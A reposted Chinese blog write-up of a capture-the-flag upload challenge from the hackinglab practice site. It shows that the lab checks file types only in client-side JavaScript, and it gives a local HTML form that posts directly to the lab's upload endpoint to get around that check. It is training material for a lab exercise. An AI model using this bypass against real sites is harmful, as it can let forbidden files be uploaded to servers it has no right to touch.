hackinglab上传关第一题

时间：2018-04-07 18:56:58 阅读：489 评论：0 收藏：0 [点我收藏+]

标签：meta body for har log blank bsp 代码 eth

请上传一张jpg格式的图片分值: 100

只能上传jpg格式的图片哦~！
通关地址

看源码，js做的文件后缀验证，极端不安全。由于我没有开brupsuit，所以将源代码复制到本地，新建一个html，内容如下：

<html>
	<head>
		<meta http-equiv=Content-Type content="text/html;charset=utf-8">
		<title>upload 1</title>
	</head>
	<body>
		请上传一张JPG格式的图片！
		<form action="http://lab1.xseclab.com/upload1_a4daf6890f1166fd88f386f098b182af/upload_file.php" method="post" enctype="multipart/form-data">
			<label for="file">文件名</label>
			<input type="file" name="file" id="file" /> 
			<br />
			<input type="submit" name="submit" value="上传" />
		</form>
	</body>
</html>
<!--在form的action那里需要将url改为绝对路径，否则会失败-->

去掉js检查，浏览器打开这个html提交，get flag success :)

hackinglab上传关第一题

标签：meta body for har log blank bsp 代码 eth

原文地址：https://www.cnblogs.com/Kog-Maw/p/8733978.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行